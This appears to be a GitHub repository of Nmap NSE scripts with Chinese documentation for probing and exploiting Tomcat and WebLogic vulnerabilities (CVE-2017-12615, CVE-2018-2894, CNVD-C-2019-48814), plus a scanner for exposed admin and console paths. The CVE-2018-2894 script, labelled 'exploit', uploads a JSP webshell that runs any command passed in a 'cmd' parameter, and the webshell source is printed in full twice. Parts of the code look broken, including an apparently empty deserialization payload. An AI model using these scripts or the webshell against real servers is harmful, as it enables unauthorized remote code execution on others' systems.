├── _config.yml ├── tomcat ├── README.md └── CVE-2017-12615 │ ├── README.md │ └── tomcat-cve-2017-12615.nse ├── weblogic ├── README.md ├── CVE-2018-2894 │ ├── README.md │ └── weblogic-cve-2018-2894.nse └── CNVD-C-2019-4814 │ └── weblogic-CNVD-C-2019-48814.nse ├── README.md └── http └── http-middleware-path-finder.nse /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-architect -------------------------------------------------------------------------------- /tomcat/README.md: -------------------------------------------------------------------------------- 1 | # Tomcat组件相关脚本 2 | 3 | * [CVE-2017-12615](https://github.com/Rvn0xsy/nse_vuln/tree/master/tomcat/CVE-2017-12615) 4 | 5 | -------------------------------------------------------------------------------- /weblogic/README.md: -------------------------------------------------------------------------------- 1 | # Weblogic 组件相关脚本 2 | 3 | * [CVE-2018-2894](https://github.com/Rvn0xsy/nse_vuln/tree/master/weblogic/CVE-2018-2894) 4 | * [CNVD-C-2019-4814](https://github.com/Rvn0xsy/nse_vuln/tree/master/weblogic/CNVD-C-2019-4814) -------------------------------------------------------------------------------- /tomcat/CVE-2017-12615/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-12615 2 | 3 | 攻击者可以利用这个漏洞,向目标服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险。 4 | 5 | ## Usage 6 | 7 | 该脚本会直接发送一个PUT请求向Web服务器写入一个文件 8 | 9 | nmap -Pn 172.19.0.2 -p 8080 --script=tomcat-cve-2017-12615 -n 10 | 11 | ## More 12 | 13 | nil. 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # nse_vuln 2 | Nmap扫描、漏洞利用脚本 3 | 4 | ## 参考学习 5 | 6 | 本来是想写成一本书的,但是可能断断续续没有很好的产出,我只能以文章的形式分享出来了,希望我的研究成果能够给大家带来便利。—— 作者:倾旋 7 | 8 | PS :如果你不知道你是否需要学习这个技术,那么我可以先告诉你Nmap能够做什么: 9 | 10 | * 网络结构画像 11 | * 漏洞扫描 12 | * 漏洞利用 13 | * 端口扫描 14 | * 爬虫 15 | * 信息搜集 16 | * .... 17 | 18 | 我的分类不是很清晰,但是对于一个渗透测试人员、运维人员、甲、乙方的工程师都会需要它的定制化功能。 19 | 20 | 例如:将扫描结果写到数据库?新的漏洞出了POC,客户需要立即进行漏洞扫描? 21 | 22 | 关于这些,我会慢慢更新.... 23 | 24 | * [Nmap扩展开发(一)](https://payloads.online/archivers/2019-04-24/1) 25 | * [Nmap扩展开发(二)](https://payloads.online/archivers/2019-04-24/2) 26 | * [Nmap扩展开发 (三) ](https://payloads.online/archivers/2019-04-24/3) 27 | * [Nmap扩展开发(四)](https://payloads.online/archivers/2019-04-24/4) 28 | 29 | 我将会持续更新这些相关的文章 :) 30 | 31 | ## 感谢 32 | 33 | 如果你觉得这个项目不错,请给予一个star。 34 | 35 | -------------------------------------------------------------------------------- /tomcat/CVE-2017-12615/tomcat-cve-2017-12615.nse: -------------------------------------------------------------------------------- 1 | local stdnse = require "stdnse" 2 | local http = require "http" 3 | prerule=function() 4 | end 5 | hostrule=function(host) 6 | return false 7 | end 8 | 9 | portrule=function(host,port) 10 | local ports = {80,8080,8090,8899} 11 | for i in pairs(ports)do 12 | if(port.number == ports[i])then 13 | return true 14 | end 15 | end 16 | end 17 | 18 | 19 | action = function(host,port) 20 | local shell_name = string.format("%sCVE-2017-12615-CHECK-%d.jsp","/",math.random(9999)) 21 | local status = stdnse.output_table() 22 | local put_rsp = http.put(host,port,shell_name.."/",nil,"CVE-2017-12615") 23 | if(put_rsp.status == 201)then 24 | status.shell_name = shell_name 25 | local response = http.get(host,port,shell_name) 26 | if(response and http.response_contains(response,"CVE%-2017%-12615") )then 27 | return status 28 | end 29 | return false 30 | end 31 | return false 32 | end 33 | postrule=function() 34 | end 35 | -------------------------------------------------------------------------------- /http/http-middleware-path-finder.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local string = require "string" 4 | local stdnse = require "stdnse" 5 | 6 | 7 | description = [[ 8 | A middleware sensitive directory scan script 9 | ]] 10 | 11 | author = "Rvn0xsy@gmail.com" 12 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 13 | categories = {"default"} 14 | blog = "https://payloads.online" 15 | -- Precision mode 16 | -- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open") 17 | 18 | portrule = shortport.service({"http","https"},"tcp","open") 19 | 20 | action = function(host, port) 21 | out = stdnse.output_table() 22 | local status, result , body = http.identify_404(host,port) 23 | local all = nil 24 | request_paths = { 25 | "/phpinfo.php", 26 | "/manager/html", 27 | "/_async/AsyncResponseService", 28 | "/console/login/LoginForm.jsp", 29 | "/phpmyadmin/", 30 | "/web-console", 31 | "/jmx-console", 32 | "/host-manager", 33 | "/status", 34 | "/logs/access_log", 35 | "/jonasAdmin/", 36 | "/ibm/console/logon.jsp" 37 | } 38 | 39 | for key,value in ipairs(request_paths) 40 | do 41 | all = http.pipeline_add(value,nil,all,'GET') 42 | end 43 | 44 | local results = http.pipeline_go(host, port, all) 45 | 46 | for num,res in ipairs(results)do 47 | if(res.status ~= result)then 48 | out[num] = request_paths[num] 49 | end 50 | end 51 | 52 | return out 53 | end -------------------------------------------------------------------------------- /weblogic/CVE-2018-2894/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-2894 2 | 3 | 4 | ws_utc 为 WebLogic Web 服务测试客户端,其配置页面存在未授权访问的问题,路径为 /ws_utc/config.do 5 | 6 | 攻击者通过访问此配置页面,先更改工作目录,用有效的 WebLogic Web 路径替换存储 JKS Keystores 的文件目录,然后在上传 JKS Keystores 时上传恶意的 JSP 脚本文件。访问最终的 JSP 文件路径地址,即可做到代码执行 7 | 8 | 安装方式:将weblogic-cve-2018-2894.nse放入nmap安装目录下的scripts目录中 9 | 10 | 说明:默认情况下会写入一个JSP执行命令的webshell: 11 | 12 | ```java 13 | <%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%> 14 | ``` 15 | 16 | 你可以通过`--script-args`来指定文件名、URI路径和文件内容 17 | 18 | ## Usage 19 | 20 | ``` 21 | root@kali:~# nmap -Pn 172.19.0.2 -p 7001 --script=weblogic-cve-2018-2894 -n 22 | Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-23 02:26 EDT 23 | Nmap scan report for 172.19.0.2 24 | Host is up (0.000055s latency). 25 | 26 | PORT STATE SERVICE 27 | 7001/tcp open afs3-callback 28 | | weblogic-cve-2018-2894: 29 | |_ url: /ws_utc/config/keystore/1532327177_test.jsp 30 | MAC Address: 02:42:AC:13:00:02 (Unknown) 31 | ``` 32 | 33 | ## More 34 | 35 | * -- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default / 36 | * -- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded 37 | * -- @args weblogic-cve-2018-2894.content file's contents 38 | * -- Other useful arguments when using this script are: 39 | * -- * http.useragent = String - User Agent used in HTTP requests 40 | 41 | 42 | -------------------------------------------------------------------------------- /weblogic/CNVD-C-2019-4814/weblogic-CNVD-C-2019-48814.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local stdnse = require "stdnse" 4 | local vulns = require "vulns" 5 | description = [[ 6 | Weblogic CNVD-C-2019-48814 7 | ]] 8 | --- 9 | -- @usage 10 | -- nmap -sV --script weblogic-CNVD-C-2019-48814 -p 7001 11 | -- nmap -sV --script weblogic-CNVD-C-2019-48814 12 | -- 13 | -- @output 14 | -- PORT STATE SERVICE 15 | -- 7001/tcp open afs3-callback 16 | -- | weblogic-CNVD-C-2019-48814: 17 | -- | VULNERABLE: 18 | -- | Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability 19 | -- | State: VULNERABLE 20 | -- | IDs: 1:CNVD-C-2019-48814 CVE:CVE-2019-???? 21 | -- | Risk factor: High CVSSv3: ??? 22 | -- | 23 | -- | Disclosure date: 2019-04-17 24 | -- | References: 25 | -- | http://www.cnvd.org.cn/webinfo/show/4989 26 | -- | http://www.cnvd.org.cn/webinfo/show/4999 27 | -- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-???? 28 | 29 | author = "Rvn0xsy " 30 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 31 | categories = {"vuln"} 32 | blog = "https://payloads.online" 33 | 34 | portrule = function(host,port) 35 | -- if(port.number == 7001)then 36 | -- return true 37 | -- end 38 | -- return false 39 | return true 40 | end 41 | 42 | action = function(host,port) 43 | local vuln_table = { 44 | title ="Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability", 45 | IDS = {CVE = 'CVE-2019-????','CNVD-C-2019-48814'}, 46 | risk_factor = "High", 47 | scores = { 48 | CVSSv3 = "???", 49 | }, 50 | description = [[]], 51 | references = { 52 | 'http://www.cnvd.org.cn/webinfo/show/4989', 53 | 'http://www.cnvd.org.cn/webinfo/show/4999', 54 | }, 55 | dates = { 56 | disclosure = {year = '2019', month = '04', day = '17'}, 57 | }, 58 | check_results = {}, 59 | extra_info = {} 60 | } 61 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 62 | vuln_table.state = vulns.STATE.NOT_VULN 63 | path = "/_async/AsyncResponseService" 64 | local result = http.get(host,port,path) 65 | local status = stdnse.output_table() 66 | if(result.status == 200)then 67 | if(string.find(result.body,"async") == nil)then 68 | local status = stdnse.output_table() 69 | status.Vuln = "False" 70 | return status 71 | end 72 | options = {} 73 | options['header'] = {} 74 | options['header']['Content-Type'] = 'text/xml' 75 | local payload = "\n\nxxxx\n\n\n\n\n\n\n\n\n\n\n\n" 76 | local response = http.post(host,port,path,options,nil,payload) 77 | if(response.status == 202)then 78 | vuln_table.state = vulns.STATE.VULN 79 | return vuln_report:make_output(vuln_table) 80 | end 81 | end 82 | return vuln_report:make_output(vuln_table) 83 | end 84 | -------------------------------------------------------------------------------- /weblogic/CVE-2018-2894/weblogic-cve-2018-2894.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local stdnse = require "stdnse" 4 | description = [[ 5 | Weblogic CVE-2018-2894 6 | ]] 7 | --- 8 | -- @usage 9 | -- nmap -sV --script weblogic-cve-2018-2894 -p 7001 10 | -- nmap -sV --script weblogic-cve-2018-2894 11 | -- --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' -p 7001 12 | -- 13 | -- @output 14 | -- PORT STATE SERVICE 15 | -- 7001/tcp open afs3-callback 16 | -- | weblogic-upload: 17 | -- |_ url: /ws_utc/config/keystore/1532325925_Nmap.jsp 18 | -- MAC Address: 02:42:AC:13:00:02 (Unknown) 19 | -- 20 | -- 21 | -- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default / 22 | -- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded 23 | -- @args weblogic-cve-2018-2894.content file's contents 24 | -- Other useful arguments when using this script are: 25 | -- * http.useragent = String - User Agent used in HTTP requests 26 | 27 | author = "Rvn0xsy " 28 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 29 | categories = {"exploit"} 30 | 31 | 32 | portrule = function(host,port) 33 | if(port.number == 7001)then 34 | return true 35 | end 36 | return false 37 | 38 | end 39 | 40 | add_formData = function(form,boundary) 41 | local contents = "\r\n" 42 | for key,value in pairs(form) do 43 | contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary) 44 | end 45 | -- return contents.."--\r\n" 46 | return contents 47 | end 48 | 49 | add_fileData = function(file,boundary) 50 | return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary) 51 | end 52 | 53 | action = function(host,port) 54 | form = {} 55 | file = {} 56 | shell = {} 57 | form["ks_name"] = "Exploit CVE-2018-2894" 58 | form["ks_edit_mode"] = "false" 59 | form["ks_password_front"] = "123456" 60 | form["ks_password"] = "123456" 61 | form["ks_password_changed"] = "true" 62 | file["name"]="ks_filename" 63 | file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp" 64 | file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>" 65 | time = os.time() 66 | uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/" 67 | boundary = "-ABC" 68 | ks_name = "Exploit CVE-2018-2894" 69 | filename = time.."_"..file["filename"] 70 | post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time() 71 | options = {} 72 | options.header = {} 73 | options.content = "\r\n--"..boundary 74 | options.header['Content-Type'] = "multipart/form-data; boundary="..boundary 75 | options.content = options.content .. add_formData(form,boundary) 76 | options.content = options.content .. add_fileData(file,boundary) 77 | resp = http.post(host,port,post_url,options,nil,nil) 78 | if(resp.status == 200)then 79 | shell["url"] = uri .. "ws_utc/config/keystore/"..filename 80 | return shell 81 | end 82 | return false 83 | end 84 | --------------------------------------------------------------------------------